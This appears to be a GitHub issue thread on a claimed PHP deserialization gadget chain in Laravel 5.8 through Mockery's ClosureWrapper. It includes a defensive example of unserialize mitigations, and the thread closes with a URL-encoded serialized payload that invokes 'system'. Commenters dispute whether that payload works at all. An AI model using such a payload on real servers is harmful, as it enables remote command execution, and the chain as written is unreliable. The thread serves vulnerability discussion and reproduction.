Open guoyanan1g opened 2 years ago
Hi @guoyanan1g, does this only affect Laravel 5?
I haven't tested the lower versions, maybe you can try to find out if these functions are in the lower versions 😂
Sorry, I was talking about the higher versions, we're currently using Laravel 8
I think it can't...
Hi @guoyanan1g, I have some trouble when reproducing the vulnerability.
1. Why is it showing this error?
2. `$c = new ClosureWrapper("dir");` why doesn't the payload have "dir"?
Hi @PinkieChen, there is a similar CVE here: https://github.com/1nhann/vulns/issues/1
The comments hold a bit more information about replicating the issue, but it seems to boil down to not unserialising unvalidated user input, which is already advised against by PHP:
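The point above (never `unserialize()` unvalidated input) in runnable form. This is an added example, not code from the issue thread or from Laravel or Mockery: the `AuditLogger` class, the `unsafeDecode`, `decodeWithoutObjects` and `decodeJson` helpers, and the serialized string are all constructed here for illustration and assume PHP 7.4 or later.

```php
<?php
// Added example (not from the issue): why unserialize() on untrusted data is
// dangerous, and two safer ways to accept structured input.
declare(strict_types=1);

// Stand-in for any class with a magic method that performs a side effect.
// No Laravel or Mockery classes are required to see the behaviour.
final class AuditLogger
{
    public string $path = '/tmp/audit.log';

    public function __destruct()
    {
        // Runs when the object is released, with attacker-chosen properties,
        // even though application code never called "new AuditLogger".
        echo "AuditLogger::__destruct() ran with path={$this->path}\n";
    }
}

// Constructed input: a client sends a serialized object where the
// application only expected a plain array.
$untrusted = 'O:11:"AuditLogger":1:{s:4:"path";s:5:"/evil";}';

// 1. Unsafe: whatever class the data names is instantiated, and its
//    __destruct/__wakeup/__call hooks become reachable.
function unsafeDecode(string $data): mixed
{
    return unserialize($data);
}

// 2. Safer: refuse to instantiate any class. Objects come back as
//    __PHP_Incomplete_Class, whose magic methods are never invoked.
function decodeWithoutObjects(string $data): mixed
{
    $value = unserialize($data, ['allowed_classes' => false]);
    if ($value === false && $data !== 'b:0;') {
        throw new InvalidArgumentException('malformed serialized data');
    }
    return $value;
}

// 3. Preferable for new code: a format that cannot express PHP objects.
function decodeJson(string $data): array
{
    return json_decode($data, true, 512, JSON_THROW_ON_ERROR);
}

$a = unsafeDecode($untrusted);
unset($a); // the __destruct line is printed here: path=/evil

$b = decodeWithoutObjects($untrusted);
var_dump(get_class($b) === '__PHP_Incomplete_Class'); // bool(true), no side effect

$c = decodeJson('{"path":"/tmp/audit.log"}');
var_dump($c['path']); // string(15) "/tmp/audit.log"
```

`allowed_classes` is a mitigation for code that must keep accepting the PHP serialization format; it blocks gadget chains like the one discussed in this issue because no class in the data is ever instantiated. Where the input format can be changed, JSON removes the problem entirely.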
Sorry, the exp is just an example showing the call/callee relationship and the order. You can view it as a reference, please don't use it as a payload directly.
Hi @guoyanan1g,
I think the exp you gave is wrong and cannot be reproduced locally.
The problem is that `$this->manager->method` (especially `method`) in Manager's `__construct()` has no effect:
```php
namespace Illuminate\Queue\Capsule {
    class Manager
    {
        protected $manager;

        public function __construct($c)
        {
            $this->manager->method = $c; // This line
        }
    }
}
```
In Laravel 5.8, Manager's `__call()` code is as follows:

```php
public function __call($method, $parameters)
{
    return $this->manager->$method(...$parameters);
}
```
In your exp example, the value of `$method` in the POP chain is `register`, and there is no `register()` function in ClosureWrapper, nor in the exp example you gave. When you set `$this->manager->method = $c`, I don't know what the intention is here.
I created a repo (https://github.com/kang8/CVE-2021-43503) to prove this. If you can create a directory (like `hello/`) with RCE, please send a PR to prove it.
@guoyanan1g, @kang8 One doubt: is it necessary that the dependent package (in this case, mockery) is available on the server in order to exploit this vulnerability?
Thanks in advance.
In fact, I can't even reproduce the vulnerability.
There is a PHP unserialize POP chain. The files and the functions are:
① laravel5.8\vendor\laravel\framework\src\Illuminate\Routing\PendingResourceRegistration.php, `__destruct()`
② laravel5.8\vendor\laravel\framework\src\Illuminate\Queue\Capsule\Manager.php, `__call()`
③ laravel5.8\vendor\mockery\mockery\library\Mockery\ClosureWrapper.php, `__invoke()`
The exp is:
//O%3A46%3A%22Illuminate%5CRouting%5CPendingResourceRegistration%22%3A5%3A%7Bs%3A12%3A%22%00%2A%00registrar%22%3BO%3A32%3A%22Illuminate%5CQueue%5CCapsule%5CManager%22%3A1%3A%7Bs%3A10%3A%22%00%2A%00manager%22%3BO%3A8%3A%22stdClass%22%3A1%3A%7Bs%3A6%3A%22method%22%3BO%3A22%3A%22Mockery%5CClosureWrapper%22%3A1%3A%7Bs%3A31%3A%22%00Mockery%5CClosureWrapper%00closure%22%3Bs%3A6%3A%22system%22%3B%7D%7D%7Ds%3A7%3A%22%00%2A%00name%22%3BN%3Bs%3A13%3A%22%00%2A%00controller%22%3BN%3Bs%3A10%3A%22%00%2A%00options%22%3Ba%3A0%3A%7B%7Ds%3A13%3A%22%00%2A%00registered%22%3Bb%3A0%3B%7D